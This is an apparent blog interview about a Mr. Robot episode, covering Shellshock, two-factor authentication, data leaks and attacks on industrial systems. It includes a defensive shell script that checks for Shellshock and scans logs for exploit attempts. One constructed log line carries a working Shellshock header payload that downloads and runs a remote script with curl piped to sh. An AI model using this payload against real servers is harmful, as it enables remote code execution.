Another week, another Mr. Robot episode! Last Wednesday the second episode of Mr. Robot aired (Ones and Zer0s). This episode did not disappoint! It was dark, gloomy, but also included lots of technical things that made us once again question: How can this affect me?
This week I sat down with freelance security and privacy journalist, Seth Rosenblatt, to discuss the episode.
At the beginning of the show, Elliot has a bit of an involuntary meeting with E-Corp's new interim CTO, Tyrell Wellick. After this meeting, Elliot goes home and hacks Tyrell. What he notices is that E-Corp's mail servers haven't been patched since "Shellshock", and that Tyrell neither uses two-factor authentication nor has a complex password. Elliot realizes that this was all too easy and that Tyrell must have wanted Elliot to hack him. He then goes nuts: he burns his chips and SIM cards in the microwave, tears apart his hard drive, and destroys his motherboard.
Stefanie: Lots of interesting stuff happened in this scene! Can someone hack me like Elliot hacked Tyrell? What is the Shellshock vulnerability and can it still affect me as a personal user?
Seth: If Tyrell wanted Elliot to hack him, he made it pretty easy for an experienced hacker like Elliot. I bet many people who do not put a lot of thought and effort into their online security can be easily hacked. The fact that E-Corp hadn't patched their servers since Shellshock seemed a bit odd, but again this was maybe intentional to make it easy for Elliot to hack, in the hopes of blackmailing him later on. In terms of the average user, Shellshock is a vulnerability that affects systems using Bash (a Unix-based command processor used by Unix-based systems such as Linux and Mac). Patches for Shellshock have long been issued, so if you update your operating system regularly you have nothing to worry about.
Stefanie: Elliot used the same “brute-force” method we talked about last week to figure out Tyrell’s password. If it’s that easy, should I use two-factor authentication in addition to having a complex password for my accounts?
Seth: In terms of using two-factor authentication, this is something that is not used enough in my opinion! It may be more work to log into accounts, but it makes your accounts more secure. Popular sites like Facebook, Twitter, and Google all offer two-factor authentication, and if you don't already use it, do it now! Of course, you should use a complex password for every account you have, because as we learned in the first episode, Elliot is able to hack a lot of people due to their weak passwords.
Stefanie: Did Elliot really have to physically destroy everything?
Seth: Elliot physically destroyed his entire computer because he was afraid Tyrell would be able to use his hack as evidence for blackmail. This was a bit extreme, but in this case he could have just destroyed his hard drive and, theoretically, some of the memory on the motherboard. Again, unless you are afraid someone may physically come after you, it is not necessary to physically destroy things.
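Two practical checks behind the Shellshock discussion above, written for this page as an added example (it is not part of the interview and not code from the show): a test of whether the local bash still has the original Shellshock bug (CVE-2014-6271), and a detection pass over web-server access logs for the exploit pattern attackers sent in HTTP headers. The log lines, IP addresses and download URL are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the interview): Shellshock checks.
#
# 1. Is the bash on this machine still vulnerable?  The bug: bash parsed
#    exported environment variables whose value starts with "() {" as
#    function definitions and kept executing whatever followed the closing
#    brace.  A patched bash ignores the trailer (and no longer imports
#    functions from arbitrary variable names at all).
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    # The trailing "echo vulnerable" only runs on an unpatched bash.
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2. Detection over web-server access logs.  Remote exploitation mostly went
#    through CGI scripts, because the web server copies request headers such
#    as User-Agent into environment variables before running the script, so
#    an attacker sends the "() {" trailer in a header.  Constructed sample
#    lines in combined log format (the addresses and URL are placeholders):
SAMPLE_LOG='10.0.0.5 - - [01/Jul/2015:10:15:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"curl http://198.51.100.7/x.sh | sh\""
10.0.0.8 - - [01/Jul/2015:10:15:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [01/Jul/2015:10:15:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { _; } >_[$($())] { echo vulnerable; }"
10.0.0.8 - - [01/Jul/2015:10:15:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1)"'

# Print log lines whose headers carry the Shellshock function-definition
# prefix.  The regex tolerates the whitespace variants seen in the wild.
detect_shellshock_attempts() {
    printf '%s\n' "$SAMPLE_LOG" | grep -E '\(\)[[:space:]]*\{'
}

# Number of matching lines; useful as an alert threshold in a cron job.
count_shellshock_attempts() {
    detect_shellshock_attempts | wc -l | tr -d ' '
}

main() {
    echo "local bash: $(shellshock_check)"
    echo "suspicious requests:"
    detect_shellshock_attempts
}

main
```

Run it on a patched system and the first line reports "patched"; the detection pass flags the two constructed CGI requests and ignores the ordinary browser traffic. In production you would feed the real access log into the same `grep` instead of the embedded sample.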
Later on in the episode Elliot's boss, Gideon, asks Elliot if he knew about the DAT file found during the E-Corp hack. Elliot tells Gideon he thought it was a junk file. Mr. Robot's fsociety releases an Anonymous-style video threatening E-Corp with "data dumps" to the media from the terabytes' worth of company employee emails and files they've stolen, if their laundry list of demands is not met.
Stefanie: What is a DAT file and why would Elliot think it is a junk file?
Seth: A DAT file is just a data file. Unlike .PDF or .DOC files, DAT files do not specify which program should open them, so you would need to know which program the DAT file was created for. DAT files are mostly sent as email attachments.
Stefanie: The Sony Pictures hack last November included data dumps. How serious a threat is that to a company?
Seth: It can be devastating. With the Sony hack, we saw a continuous flow of sensitive corporate data, personnel records including salary details, as well as embarrassing correspondence between senior executives leaked to the press. Who knows what nefarious things a company like "Evil" Corp has in their files. Mr. Robot would hit 'em where it hurts.
Around the 22:41 mark, Mr. Robot asks Elliot to use his Allsafe company security clearance to hack the Comet P.L.C. and increase the pressure in the nearby gas lines, so that the natural gas plant and its pipeline blow up next to "Steel Mountain", a data-storage facility used by major corporations.
Stefanie: Can even an above-average "hacker" like Elliot access municipal utilities and gain access to dangerous and highly controlled industrial processes, like the ones regulating the valves for gas lines?
Seth: Unfortunately, the answer is yes. On the whole, it has been proven that industrial infrastructure remains woefully vulnerable to computer attacks that could have devastating consequences. Our nation's energy grid is continually under attack; in fact, in 2014, there were 79 incidents investigated by Homeland Security. Russian hackers have already infiltrated software that controls electrical turbines in the U.S., and in the case of one major U.S. energy provider, spyware sat on their computers for a year. It got there by one employee clicking on a bad link in an email.
When explaining how the gas plant will go kablooey, Mr. Robot says that once they blow up the pipeline, Darlene's worm will kick into gear at the data center and the "Dark Army" will take care of the redundant backups at the Chinese facility.
Stefanie: We've heard of worms like Stuxnet, is that the kind of thing you think fsociety is planning to use? And who could the Dark Army be?
Seth: Stuxnet was developed to infiltrate software and remotely shut down Iran’s uranium enrichment facilities, so it is reasonable to assume that fsociety will deploy a similar worm. It was the first known malware with the ability to cause physical damage to electrical or mechanical devices, and data centers with gaps between IT and facilities systems could be vulnerable.
As for the Dark Army, we don't know whom Mr. Robot is talking about, but there do exist mercenary hackers for hire. They sell their skills to nation-states or militant groups and do a good job of covering their tracks before going on to the next customer.
At 27:59 Elliot hacks into the account of his drug dealer, Fernando Vera. His password is eatdick6969. Elliot discovers that Fernando does all his drug transactions through email, chat messages, and Twitter. Digging deeper, Elliot also learns that Vera uses code words in his tweets that are keyed to recent news articles. Words such as "Biscuit" and "Clickety" are clearly references to guns and gun sales. "Food", "Seashells" and "gas" are codes he uses for bullets.
Stefanie: Drug dealers have used code words for drugs since phone calls were invented. Why is this significant? Is this news-headline code wording a pattern used in underground organizations? Have there been recent examples?
Seth: As criminal investigations today can include checking a suspect's emails, instant messages, and Twitter history, drug dealers need to find a way of getting around these investigations and blurring messages, so investigations get harder and their communications history cannot be used as proof against them. The news-headline code-wording pattern helps to constantly have new code words, which makes it harder for the police to understand the message behind the code. Just last fall, a drug-trafficking ring in the U.S. was disrupted that spoke about "Hurricane Sandy" when speaking about one of their drugs.
What's surprising, though, is that Fernando uses his personal accounts and public Twitter messages in order to do his drug-dealing business. Drug dealers often use pre-paid phones for their "business" that don't have an account, so the owner cannot be identified. Also, they frequently dispose of the phones and get new ones to obfuscate their activities and whereabouts.
At 32:14, Elliot picks the bathroom lock. He explains that "the lock-pick is every hacker's favorite sport. Unlike virtual systems, when you break it you can feel it."
Stefanie: When I saw this scene, it sounded familiar to me. Last year I had the pleasure of meeting Kevin Mitnick, once the most wanted hacker in the United States, hunted by the FBI. Today he is a reputable security consultant; the hacks he does today have the purpose of finding security issues in order to fix them. When I met him, he handed me his business card, and it was in the form of lock picks.
Seth: Absolutely, this is not just a cliché. Hackers like to hack, not just in the digital sense, but also in the real world!